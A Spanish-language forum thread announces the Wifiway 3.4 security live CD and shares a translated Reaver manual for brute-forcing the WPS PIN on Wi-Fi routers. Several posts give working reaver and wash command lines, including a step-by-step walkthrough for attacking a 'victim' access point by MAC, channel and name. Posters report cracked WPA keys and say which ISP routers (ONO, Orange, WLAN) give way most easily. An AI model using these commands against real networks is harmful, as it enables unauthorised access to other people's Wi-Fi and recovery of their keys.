Noticias: RS4800HD
 
Usuario
Contraseña
Páginas: [1] 2 3
  Imprimir  
Autor Tema: Liberado wifiway-3.4 nuevo  (Leído 83398 veces)
0 Usuarios y 1 Visitante están viendo este tema.
meca2123
Co-Administrador
****
Desconectado Desconectado

Mensajes: 29706


Liberado wifiway-3.4 nuevo
« : 24/01/2012, 09:22 »

Esto lo he encontrado en otro foro. y dicen que va muy bien, a ver si luego puedo poner la direccion de descarga

Liberado wifiway-3.4 nuevo
Bueno , pues despues de un par de semanas de salir wifiway 3.0 , lanzamos esta version 3.4 con arreglos varios y añadidos interesantes como la aplicacion de moda actualmente ( reaver wps ).

Es una masterizacion de wifiway 3.0 con la mayoria de problemas solventados, o al menos los de categoria “critica o grave” …como los problemas de booteo.

la lista de cambios no es muy extensa ,pero si interesante.

Código:
Reconstruido modulo nvidia por conflico con intel 3945
Actualizado hashcat a version 007
Actualizado aircrack-ng a version 1.1 revision 2022
Añadido cheat max_loop=255 en las opciones de arranque
Añadido reaver 1.4
Añadido salvar sesion reaver
Añadido walsh
Solventados los problemas de booteo
Modificado script lilo y alguno mas apuntando a initrd.xz y no a initrd.gz que ya no se usa.
Eliminadas algunas paginas guardadas en firefox
Cambiado script make_iso por el del equipo de desarrollo
Cambiado dir2xzm por tener una version vieja
Eliminado sonido de bienvenida
En esta ocasion tengo que dar gracias a mas gente , cosa que me alegra, por que significa que hay gente que es capaz de colaborar de la manera que pueda , como nosotros ..en sus ratos libres, sin ningun tipo de ineteres y que por aqui no solo hay gente inetersada en REVENTAR WIFIS AJENAS.

A lo cual aprovecho recordar NO DAMOS SOPORTE Y NO ES NUESTRA FILOSOFIA , solo compartimos inquetudes desinteresadamente.


y de aqui os lo podeis descargar:

[Para ver el Enlace debes registrarte]
http://download.wifislax.com/wifiway-3.4.iso



"Te han dado las Grácias":
1. raul7, 2. veinticinco, 3. ivamche, 4. alextrbn, 5. arandelas1, 6. rubenaco2, 7. jonayr10, 8. dicoga, 9. dunkan1973


« Última modificación: 24/01/2012, 12:11 por meca2123 » En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #1 : 15/02/2012, 23:10 »

Manual castellano reaverFuente original


[Para ver el Enlace debes registrarte]
http://code.google.com/p/reaver-wps/wiki/README


Autor traduccion: gpain

Zona de Descarga


[Para ver el Enlace debes registrarte]
http://code.google.com/p/reaver-wps/downloads/list


Ultima version


[Para ver el Enlace debes registrarte]
http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

SHA1 Checksum:    408a4d4cd5051d290a68c140d3351acbf32dc4a 7

Incluido en wifiway 3.4, unica live del mundo que lo incorpora de serie
DESCARGA OFICIAL:
[Para ver el Enlace debes registrarte]
http://download.wifislax.com/wifiway-3.4.iso

MD5: 3e0645da12d5bbbdb4dd335c891e2866

Observaciones
Puedes copiar este manual en todos los sitios que deseis, solo pedimos que por favor
mantengais el autor de la traduccion gpain

Resumen

Reaver lleva a cabo un ataque de fuerza bruta contra el número pin de la configuración protegida del punto de acceso wifi. Una vez que el pin WPS es encontrado, la WPA PSK puede ser recuperada y alternativamente la configuración inalámbrica del AP puede ser reconfigurada.

Aunque reaver no soporta la reconfiguración del AP, se puede conseguir con el wpa_supplicant una vez el pin WPS es conocido.

DESCRIPCIÓN

Reaver tiene como objectivo la funcionalidad externa de “registrador” requerida por la especificación de configuración inalámbrica protegida. Los puntos de acceso proveerán “registradores” autenticados con su configuración inalámbrica actual (incluyendo la WPA PSK), y también aceptaran una nueva configuración del registro.

Con el fin de autenticarse como “registrador”, el “registrador” debe probar su conocimiento del número pin de 8 dígitos del AP. Los “registradores” deberían autenticarse a sí mismos al AP sin importar cuando sin la interacción del usuario.

A causa de que el protocolo WPS es conducido sobre EAP, el “registrador” sólo necesita estar asociado con el AP y ningún conocimiento previo del cifrado inalámbrico o de la configuración.

Reaver lleva acabo un ataque de fuerza bruta contra el AP, probando cada posible combinación para adivinar el número pin de 8 dígitos del AP. Desde que los números pin son entéramente numéricos, hay 10^8 (100.000.000) posibles valores para cualquier número pin. Sin embargo, como el último dígito del pin es un valor checksum (de comprobación) que puede ser calculado en base a los 7 dígitos previos, la posibles claves son reducidas a 10^7 (10,000,000) valores posibles.

Las posibles llaves son reducidas incluso más debido al hecho de que el protocolo de autentificación WPS corta el pin por la mitad y valida cada mitad individualmente. Eso significa que hay 10^4 (10.000) posibles valores para la primera mitad del pin y 10^3 (1.000) posibles valores para la segunda mitad del pin, contando el último dígito de comprobación del pin.

Reaver hace fuerza bruta a la primera mitad del pin y luego a la segunda mitad, provocando que todos los posibles valores del número pin del WPS puedan ser puedan ser agotados en 11.000 intentos. La velocidad a la que Reaver puede probar los números pin está totalmente limitada por la velocidad a la que el AP puede procesar peticiones WPS. Algunos APs son suficientemente rápidos para que se pueda probar un pin cada segundo; otros son mas lentos y solo permiten un pin cada 10 segundos. Estadísticamente, sólo llevara la mitad del tiempo adivinar el número pin correcto.

INSTALACIÓN

Reaver sólo está soportado en la plataforma linux, requiere las librerias libpcap y libsqlite3, y puede ser construido e instalado ejecutando:

Código:
                $ ./configure
                $ make
                # make installPara desinstalar todo lo instalado/creado por Reaver:

Código:
    # make distcleanUSO

Habitualmente, el único argumento requerido para Reaver es el nombre de la interfaz y el BSSID del AP objetivo:

Código:
# reaver -i mon0 -b 00:01:02:03:04:05El canal y SSID (teniendo en cuenta que el SSID no esta encubierto) del AP objetivo son identificados automáticamente por Reaver, a menos que se especifique explícitamente en la línea de comando:

Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksysPor defecto, si el AP cambia canales, Reaver también cambiará su canal en consecuencia. Sin embargo, está característica puede ser desactivada “fijando” el canal de la interfaz.

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 --fixedEl tiempo de espera de recepción por defecto es 5 segundos. Este tiempo de espera puede ser configurado manualmente si fuera necesario (el tiempo de espera mínimo es 1 segundo):

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 -t 2El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser incrementado o decrementado a cualquiera valor entero no negativo. Un valor de cero significa sin retraso:

Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0Algunos APs bloquearán temporálmente su estado WPS, normalmente durante 5 minutos o menos, cuando es detectada actividad “sospechosa”. Por defecto cuando se detecta un estado bloqueado, Reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo:

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250Para salidas adicionales, se debe proporcionar la opción “verbose”. Proporcionando la opción “verbose” dos veces se incrementará el nivel de detalle y se mostrará cada número pin intentado.

Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -vvEl tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es .1 segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario (tiempo de espera máximo 1 segundo).

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 -T .5Algunas implementaciones WPS pobres tirarán la conexión, cuando se suministre un pin inválido en vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin embargo, si se sabe que el AP envía NACKS (la mayoría lo hacen), esta característica puede ser desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que Reaver autodetectará si un AP responde adecuadamente con NACKs o no:

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 --nackAunque a la mayoría de los APs no les importa, enviar un mensaje EAP FAIL para cerrar una sesión WPA es necesario a veces. Por defecto esta característica esta deshabilitada, pero puede habilitarse para aquellos APs que la necesiten.

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminateCuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de advertencia. Cómo esto es una señal de que el AP está limitado el ratio de intentos del pin o simplemente siendo desbordado, se fijará una pausa cuando aparezcan estos mensajes:

Código:
 # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360ARCHIVOS

Lo siguiente son archivos fuente de Reaver:

80211.c Funciones para leer, enviar y analizar trazas de gestión 802.11
builder.c Funciones para construir paquetes y paquetes de encabezado
config.h Generado por el script de configuración
cracker.c Funciones principales de crackeo para Reaver.
defs.h Encabezados comunes con la mayoría de las declaraciones y definiciones requeridas.
exchange.c Funciones para iniciar y procesar el intercambio WPS.
globule.c Funciones de contenedor para acceder a los ajustes globales.
iface.c Funciones de la interfaz de red.
init.c Funciones de inicialización.
keys.c Contiene tablas de todos los posibles pins.
misc.c Conversión de direcciones mac, funciones de depurado, etc
pins.c Generación de Pin y funcione de aleatoreidad.
send.c Funciones para enviar mensajes de respuesta WPS
sigalrm.c Funciones para el manejo de interrupciones SIGALRM
sigint.c Funciones para el manejo de interrupciones SIGINT
wpscrack.c Principal archivo fuente de Reaver
wps.h Incluye funciones para wpa_supplicant
libwps/ Generic Librería para analizar los elementos de información WPS

Los siguientes archivos han sido cogidos de wpa_supplicant. Algunos han sido modificados a partir de sus originales.

common/
crypto/
tls/
utils/
wps/

El directorio Iew contiene la version 29 de Wireless Tools, usada para interactuar con las extensiones inalámbricas de Linux.


En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #2 : 19/02/2012, 18:54 »

modulo de reaver 1.4 final--actualizado

se descarga, se mete en la carpeta base o modules de wifiway 3.4 y se inicia wifiway,,yo utilizo pendray booteado

y el comando del walsh para detectar aps vulnerables (con wps activo)ahora es:

wash -i mon0 -C



En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #3 : 20/02/2012, 12:34 »

pues si,sin diccionarios

mi clave de ono,codificada en WPA-PSK ,con wps activo

sacada en 13.7 horas(49427 sg)

ONO****

con reaver actualizado,wifiway 3.4
y antena alfa 1w AWUSO

saludos


« Última modificación: 20/02/2012, 13:10 por raul7 » En línea
julioli8
Usuario de los más grande
*****
Desconectado Desconectado

Mensajes: 697


Re: Liberado wifiway-3.4 nuevo
« Respuesta #4 : 27/02/2012, 12:39 »

porque no meten ese reaver al disco iso.
yo abro la iso wifiway. meto la carpeta, pero despues no me deja grabarlo denuevo., o como lo haces?


En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #5 : 27/02/2012, 21:21 »

porque no meten ese reaver al disco iso.
yo abro la iso wifiway. meto la carpeta, pero despues no me deja grabarlo denuevo., o como lo haces?

yo uso pendray booteado y lo meto en carpeta modulos o bases

desde cd,tambien puedes hacerlo,,mete ese fichero en un pendray y cuando  arranques wifiway,arriba a izquierda
sale dispositivos estraibles,selecciona pendray y te llevas ese fichero(reaver 1,4 ) al escritorio y lo ejecutas alli

asi lo tendras cargado en esa sesion

saludos


En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #6 : 27/02/2012, 21:40 »

cuando la cosa esta bien,asi saldra la pantalla del reaver,hasta llegar al 100%

todo positivos(+) al comienzo de linea,en red con wps activo


redes-wireless-liberado-wifiway-3-4-nuevo


En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #7 : 28/02/2012, 00:08 »

Rizando el rizo,,genial

MODULO: WPSCRACKGUI-1.0.9
DESCRIPCION: interfaz grafica para reaver y wash , ademas incluye algunas opciones extra.
COMPATIBILIDAD: wifiway 3.4
DESCARGA:
[Para ver el Enlace debes registrarte]
http://www.downloadwireless.net/modulos/wifiway-3-4/wpscrackgui_1.0.9.xzm

by USUARIONUEVO


redes-wireless-liberado-wifiway-3-4-nuevo


En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #8 : 28/02/2012, 21:18 »

escaneo de redes con wps activo
redes-wireless-liberado-wifiway-3-4-nuevo

clave wpa,auditada con reaver 1.4,,en wifiway 3.4

redes-wireless-liberado-wifiway-3-4-nuevo


« Última modificación: 28/02/2012, 21:26 por raul7 » En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #9 : 04/03/2012, 22:31 »

Guardar sesion usando wifiway en cd :

mete un pendray a deco,,y cuando vayas a cerrar reaver,,hay una opcion debajo del reaver,,q pone guardar sesion,le das antes de cerrar reaver y te crea en escritorio un archivo.xzm
llevatelo de alli a pendray ,con el icono q sale en wifiway arriba a izquierda(dispositivos estraibles)
la proxima vez q vayas a abrir reaver,traete otra vez ese archivo al escritorio y selecciona   la misma red con reaver

asi puedes tener varias redes preparadas y a medias,almacenadas en pendray


lo suyo es usar wifiway en pendray booteado,asi se hace

[Para ver el Enlace debes registrarte]
http://www.forokeys.com/foro/redes-wireless/segunda-opcion-para-bootear-un-pen-driver-con-wifiway/



« Última modificación: 04/03/2012, 22:43 por raul7 » En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #10 : 06/03/2012, 22:00 »

Un pequeño manual ,testado por mi

1-poner en modo monitor
inicio/wifiway/suite aircrack-ng/airmon-ng(start modo monitor)
wlan0/aplicar
cerramos esas ventanas y ya la tenemos en mon0

2-buscamos objetivos con wps activo
inicio/wifiway/wpa wps/buscar objetivos con wps activado(walsh)
escribimos en esa consola
walsh -i mon0 -C
apuntamos los datos de nuestra victima:bbsid(mac) essid(nombre) y canal
cerramos esa consola

3-atacar protocolo WPS con reaver
inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
alli escribimos
reaver -i mon0 -b (mac de la victima) -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N -vv

o esta
reaver -i mon0 -b (mac de la victima) -c (canal de la victima) -vv --no-nack -d 5

o esta
reaver -i mon0 -b (mac de la victima) -c (canal de la victima)

y pulsamos enter


4-esperar  al 100%
suele tardar una media de 12 horas
********************************************************************************************************
Guardar ataque
desde WifiWay 3.4 y reaver 1.4, cuando salvas avance en XZM , lo deberia de crear en el escritorio.
Luego ese archivo lo haz de introducir en la carpeta de wifiway en base o modules.
y cuando quieras atacar de nuevo a esa red,,lo pones en escritorio,de nuevo

espero q os sirva

testado con antena alfa 1w awuso


« Última modificación: 11/03/2012, 17:49 por raul7 » En línea
ciruselvirus
Forero de Calidad
**
Desconectado Desconectado

Mensajes: 16


Re: Liberado wifiway-3.4 nuevo
« Respuesta #11 : 11/03/2012, 12:27 »

3-atacar protocolo WPS con reaver
inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
alli escribimos
reaver -i mon0 -b (mac de la victima)  -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N  -vv

o esta
reaver -i mon0 -b (mac de la victima)  -c (canal de la victima) -vv --no-nack -d 5

o esta
reaver -i mon0 -b (mac de la victima)  -c (canal de la victima)

4-esperar  al 100%
suele tardar una media de 12 horas
hola raul7 despues de escribir una de estas lineas ay que dar a enter es que aki me e perdido un poco, un saaludo


En línea
dsr2001
Forero Activo
**
Desconectado Desconectado

Mensajes: 48


Re: Liberado wifiway-3.4 nuevo
« Respuesta #12 : 11/03/2012, 15:57 »

3-atacar protocolo WPS con reaver
inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
alli escribimos
reaver -i mon0 -b (mac de la victima)  -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N  -vv

o esta
reaver -i mon0 -b (mac de la victima)  -c (canal de la victima) -vv --no-nack -d 5

o esta
reaver -i mon0 -b (mac de la victima)  -c (canal de la victima)

4-esperar  al 100%
suele tardar una media de 12 horas
hola raul7 despues de escribir una de estas lineas ay que dar a enter es que aki me e perdido un poco, un saaludo

Debes instalar el reaver que esta en un post mas abajo puesto por Raul, y si cuando tengas la linea pulsa enter ( no todos los objetivos que has localizado, se pueden atacar, no se el motivo pero es así), a ver si Raul nos explica con mas detalle y porque solo toma objetivos de formato WLAN-XXXX.

Raul, Rizando el rizo,,genial, Si es posible alguna aclaración sobre el manejo de WPSCRACKGUI-1.0.9


« Última modificación: 11/03/2012, 16:07 por dsr2001 » En línea
raul7
Co-Administrador
****
Conectado Conectado

Mensajes: 27796


Re: Liberado wifiway-3.4 nuevo
« Respuesta #13 : 11/03/2012, 17:46 »

Debes instalar el reaver que esta en un post mas abajo puesto por Raul, y si cuando tengas la linea pulsa enter ( no todos los objetivos que has localizado, se pueden atacar, no se el motivo pero es así), a ver si Raul nos explica con mas detalle y porque solo toma objetivos de formato WLAN-XXXX.
Raul, Rizando el rizo,,genial, Si es posible alguna aclaración sobre el manejo de WPSCRACKGUI-1.0.9

el WPSCRACKGUI-1.0.9,,lo use 2 veces y no me gusto,no te deja usar algunos comandos del tipo:-d 5 -w -N  -vv

prefiero el reaver1.4,,directo
escaneo redes con wps activo y la q mas señal tenga,la elijo(ojo ,es la q el pwr este mas bajo)

las de orange se desactiva el wps y ya no te deja seguir.
las wlan,normalmente salen rapido con el wpa_key(herramienta disponible en wifiway 3.4).
las de ONO son las q mejor resultado me dan,junto con las q llevan nombre.
vodafone,todavia no he probado ninguna.
me refiero a las codificadas en wpa,,las wep salen todas con otras herramientas del ww3.4(wifiway3.4)
saludos


En línea
dsr2001
Forero Activo
**
Desconectado Desconectado

Mensajes: 48


Re: Liberado wifiway-3.4 nuevo
« Respuesta #14 : 12/03/2012, 20:59 »

el WPSCRACKGUI-1.0.9,,lo use 2 veces y no me gusto,no te deja usar algunos comandos del tipo:-d 5 -w -N  -vv

prefiero el reaver1.4,,directo
escaneo redes con wps activo y la q mas señal tenga,la elijo(ojo ,es la q el pwr este mas bajo)

las de orange se desactiva el wps y ya no te deja seguir.
las wlan,normalmente salen rapido con el wpa_key(herramienta disponible en wifiway 3.4).
las de ONO son las q mejor resultado me dan,junto con las q llevan nombre.
vodafone,todavia no he probado ninguna.
me refiero a las codificadas en wpa,,las wep salen todas con otras herramientas del ww3.4(wifiway3.4)
saludos

Gracias Raul, seguiremos investigando.


En línea
Páginas: [1] 2 3
  Imprimir  

 
Ir a:  






!! ADVERTENCIA !!: Las informaciones aqui publicadas NO CONTIENEN KEYS para la decodificacion de ningún sistema: Consisten en herramientas, programas y manuales para el uso con receptores y dispositivos electrónicos comerciales. NO SON OPERATIVOS en sistemas SAT que precisen de su correspondiente suscripción.

ESTA TOTALMENTE PROHIBIDO EL USO DE ESTAS INFORMACIONES PARA LA MODIFICACIÓN O  DEFRAUDACIÓN DE SISTEMAS DE ACCESO CONDICIONAL.

No Irdeto files or communications allowed.



Flag Counter
Powered by
54.166.8.138
Ley de cookies 34/2002 Página creada en 0.152 segundos con 36 consultas. (Rewrite 0.016s, 2q)

Google ha estado aquí Hoy a las 00:36